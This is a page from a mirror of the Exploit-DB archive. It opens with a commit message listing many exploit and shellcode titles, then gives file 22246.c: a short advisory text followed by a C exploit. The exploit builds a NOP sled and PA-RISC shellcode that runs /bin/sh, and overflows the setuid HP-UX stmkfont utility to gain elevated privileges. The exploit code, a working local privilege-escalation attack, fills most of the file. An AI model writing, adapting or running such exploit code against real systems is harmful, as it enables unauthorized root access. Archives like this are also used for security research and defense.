bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hp-ux/local/22246.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

63 lines
No EOL
2.2 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/6836/info
A buffer overflow vulnerability has been reported in the stmkfont utility shipped with HP-UX systems. The problem occurs due to insufficient bounds checking on user-suplied data to the alternate typeface library command-line option.
A local attacker may be able to exploit this issue to execute arbitrary code with elevated privileges.
All Avaya PDS 9 and 11 platforms are vulnerable to this issue. Avaya PDS 12 platforms running on HP-UX 11.00 are vulnerable as well. PDS 12 versions running on HP-UX 11.11 are not vulnerable.
/*## copyright LAST STAGE OF DELIRIUM jun 2002 poland *://lsd-pl.net/ #*/
/*## /usr/bin/stmkfont #*/
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#define ADRNUM 1200
#define NOPNUM 12000
#define PADNUM 3
char shellcode[]=
"\xeb\x5f\x1f\xfd" /* bl .+8,%r26 */
"\x0b\x39\x02\x99" /* xor %r25,%r25,%r25 */
"\xb7\x5a\x40\x22" /* addi,< 0x11,%r26,%r26 */
"\x0f\x40\x12\x0e" /* stbs %r0,7(%r26) */
"\x20\x20\x08\x01" /* ldil L%0xc0000004,%r1 */
"\xe4\x20\xe0\x08" /* ble R%0xc0000004(%sr7,%r1) */
"\xb4\x16\x70\x16" /* addi,> 0xb,%r0,%r22 */
"/bin/sh"
;
char jump[]=
"\xe0\x40\x00\x00" /* be 0x0(%sr0,%rp) */
"\x37\xdc\x00\x00" /* copy %sp,%ret0 */
;
char nop[]="\x0a\xb5\x02\x95";
int main(int argc,char **argv){
char buffer[20000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM jun 2002 poland //lsd-pl.net/\n");
printf("/usr/bin/stmkfont for HP-UX 10.20 700/800\n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()-16732;
printf("0x%x\n",*((unsigned long*)adr));
envp[0]=&buffer[2000];
envp[1]=0;
b=buffer;
for(i=0;i<PADNUM;i++) *b++=0x61;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
*b=0;
b=&buffer[2000];
strcpy(b,"lsd=");b+=4;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/bin/stmkfont","lsd",buffer,0,envp);
}
Reference in a new issue View git blame Copy permalink